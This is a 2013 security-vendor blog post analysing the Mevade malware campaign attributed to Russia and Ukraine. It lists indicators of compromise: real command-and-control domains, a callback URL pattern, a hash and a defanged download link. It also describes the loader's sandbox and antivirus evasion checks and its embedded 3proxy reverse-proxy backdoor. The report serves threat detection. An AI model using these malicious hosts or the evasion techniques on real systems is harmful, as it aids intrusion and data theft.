This website uses cookies, including for advertising, social media and analytics purposes. To see what cookies we use and how to change your cookie settings, click here. By continuing to browse this website, you accept our use of cookies. Close

Our Blog

Massive Russian Cyber-criminal Campaign Targets Business Services, Manufacturing, Government, and Transportation Industries

Share

Tuesday, Oct 22, 2013

Websense Security Labs™ researchers have discovered a widespread cybercrime campaign utilizing the Mevade malware that appears to be originating from Russia and Ukraine and primarily targeting the business services, government, manufacturing, and transportation sectors in the US, UK, Canada, and India.

In this post we analyze the malware, command and control characteristics, and attack infrastructure used in this campaign.

Executive Summary

Websense research performed on 3rd party feeds indicates that this campaign has infected hundreds of organizations and thousands of computers world-wide and appears to be used for a variety of purposes, including redirecting network traffic and click fraud, as well as search result high-jacking. However, the extensible Mevade malware provides a very capable mechanism for data theft through reverse proxying capabilities. Websense customers are protected against attacks such as this at multiple stages of the attack cycle, including attack infrastructure and C2 protocol.

  • Websense Labs researchers have observed a massive cyber campaign that appears to have originated from Russia and the Ukraine beginning around July 23, 2013, and that continues today
  • Targeted industries include: Business Services, Government, Manufacturing, and Transportation
  • Targeted countries include: USA, United Kingdom, Canada, and India (among others)
  • The malware analysis of Mevade below shows use of a reverse proxy capability (similar to Shylock), indicating a very flexible dropper that is well suited to rerouting network traffic, targeted theft of information, and facilitating lateral movement through target networks by creating a network-level backdoor
  • We have observed the command and control infrastructure, detailed below, hosting malware and exploits such as CVE-2012-4681, dating back to August 2012
  • We have observed links with this campaign's malware (7C5091177EA375EB3D1A4C4A2BBD5EB07A4CC5CC) are associated with the large spike in Tor (Onion Router) which was presumably providing anonymity for the cyber criminals C&C servers in August 2013
  • The heavy use of attack infrastructure (C2 servers) located in Ukraine and Russia and Mevade malware links this group to a potentially well-financed cyber-crime gang operating out of Kharkov, Ukraine and Russia

Special thanks to Websense Labs Researchers Jack Rasgaitis and Gianluca Giuliani for their contributions to this report.

Targeted Industries

Industry

Industries

Targeted Locations vs. Command and Control Infrastructure

Arizona Targeted

Malware Callbacks

The malware calls back with GET requests of the following example format: 

  • http://updsvc.net/updater/3ad219fe94fbcaba3687c5298358998d/2

A signature can be built with /updater/[32 random characters]/[1 or 2]

Examples:

  • /updater/28d949f1d82631dac4539d5d1ac21d6c/2
  • /updater/5eafaed947ea36a0ccec58e788a77b35/2
  • /updater/389b71b07d4d376a70952a1b1c571d68/2
  • /updater/01e8d75a7a368f854bcef52136985092/2
  • /updater/660c989f210fd7027085731478ab5922/2
  • /updater/fbd1375f6a9049ad9dbd0e0a38be4a8a/2
  • /updater/5122379f40e7431638125d6ee939827c/2
  • /updater/cd9d21a004c3a578ac0da997193315be/2
  • /updater/43028ea498e6ec76f5b69d47f0ede71e/2
  • /updater/5f3f651c20e5bfd5ddab74536ddb3b7b/2
  • /updater/bae58af607a8c88c08b9843aaec0327f/2 

Domains being used for command and control:

  • service-stat.com
  • updservice.net
  • autowinupd.net
  • autoavupd.net
  • service-update.net
  • full-statistic.com
  • service-statistic.com
  • stetsen.no-ip.org
  • autodbupd.net
  • automsupd.net
  • titanium.onedumb.com
  • statuswork.ddns.info
  • fullstatistic.com
  • service-statistic.com
  • autosrvupd.net
  • full-statistic.com
  • fullstatistic.com
  • service-update.net
  • storestatistic.com
  • updsvc.net
  • fullstatistic.com
  • reservestatistic.net
  • srvupd.com
  • automsupd.net
  • stotsin.ignorelist.com
  • autosrvupd.net
  • autosrvupd.net
  • reserve-statistic.com
  • autodbupd.net
  • workstat.hopto.org
  • service-statistic.com
  • full-statistic.com
  • srvupd.com
  • updsvc.net
  • automsupd.net
  • autosrvupd.net
  • assetsstatistic.com
  • assetsstatistic.com
  • assetsstatistic.com
  • srvupd.com
  • updsvc.net
  • reserve-statistic.com
  • reserve-statistic.com
  • autodbupd.net
  • fullstatistic.com
  • reservestatistic.net
  • reserve-statistic.com
  • srvupd.com
  • updsvc.net
  • fullstats-srv.net
  • stats-srv.com
  • fullstats-srv.com
  • statssrv.com
  • reserv-stats.net
  • reserv-stats.com
  • pushstatistics.com
  • stats-upd.net
  • reservstats.com
  • push-statistics.net
  • push-stats.net
  • push-stats.com
  • fullstatistic.com 

Interestingly, most of the domains above are registered with the following contact email address: gmvjcxkxhs@whoisservices.cn contact info: "Whois Privacy Protection Service|Whois Agent", which indicates a single service was used to register these domains. A quick search of our domain registration database indicates that over 7,000 domains have been registered using this service. 

The majority of Command and Control related IP addresses can be attributed back to the following ASN:

AS44050

Country: RU

Registration Date: 2007-11-09

Registrar: ripencc

Owner: PIN-AS Petersburg Internet Network LLC 

Malware Analysis

  • Malware sha1=7C5091177EA375EB3D1A4C4A2BBD5EB07A4CC5CC Size=369152
  • Historically seen hosted at: hxxp://service-stat.com/attachments/v4_sl.exe

Microsoft first detected this malware as Mevade.A on July 2, 2013.

Static Analysis of Malware (SHA1 7C5091177EA375EB3D1A4C4A2BBD5EB07A4CC5CC)

As you can see below, the malware is using an integrated services language based on SQL, called WQL (SQL for Windows Management Interface). Below you can see a snippet of code that queries the target system's database to learn the security settings.

Microsoft

Here is the direct WQL query to the Windows Management Interface to learn more about installed AntiVirus.  

Window Management

The malware authors were kind enough to leave us a list of AV engines that they were attempting to detect.

Sanxbox

Interestingly, the malware attempts to detect the existence of the "Sandboxie" tool commonly used by researchers to analyze malware. Below is a check executed by the malware for the presence of Sandboxie DLLs.

Sandbox

Below, we see a direct check executed by the malware to search for Oracle/Sun VirtualBox services.

Arizone Malware

AV and Security checks complete, install the malware service...

The malware contains a “Resources” section that is used by the code as shown below.

Resources

This confirms our suspicion that the software we have analyzed so far is a loader program to install the malware service.

Arizone Malware

The obfuscated code below is used to confirm that the security checks above executed correctly.

Arizone Malware

Once the security checks have been validated and the resources section properly decoded, the loader attempts to install the malware as a service. Below is the sequence of functions offered by the installer.

Arizone Malware

Interestingly, the buffer below contains references to the "3proxy" open source proxy software that we have previously seen associated with the Shylock/Caphaw malware.

Malware

3proxy is a tiny proxy which can be installed on Windows-based systems (hxxxp://www.3proxy.ru/) .  More information about 3proxy below. 

Arizona Malware

Why Embed 3proxy in Malware?

A lightweight proxy such as 3proxy provides functionality in advanced malware to allow attackers to tunnel traffic directly through the malware and directly onto a target network. In these cases, the Proxy is configured as a reverse proxy, with the ability to tunnel through NAT (Network Address Translated) environments to create a connection to the attacker's infrastructure and initiate a backdoor directly into the target network (in this case, using SSH over port 443). The use of reverse proxies indicates that the cyber-criminals plan to manually scan a network and move laterally towards more critical apps and information (such as databases, critical systems, source-code, and document repositories) than might exist on the original machine that has been compromised. 

Details on Shylock's use of 3proxy:

  • Shylock malware to the 3proxy.ruP: Pray Before You Buy With Shylock http://baesystemsdetica.blogspot.co.uk/2013/03/pray-before-you-buy-with-shylock.html

Historical Similarities

IP addresses associated with the Command and Control domains above have been associated with hosting the Java 0-day CVE-2012-4681 in August, 2012.

Malware sample associated with the recent spike in Tor (Onion Router) traffic observed in September 2013 

About the Author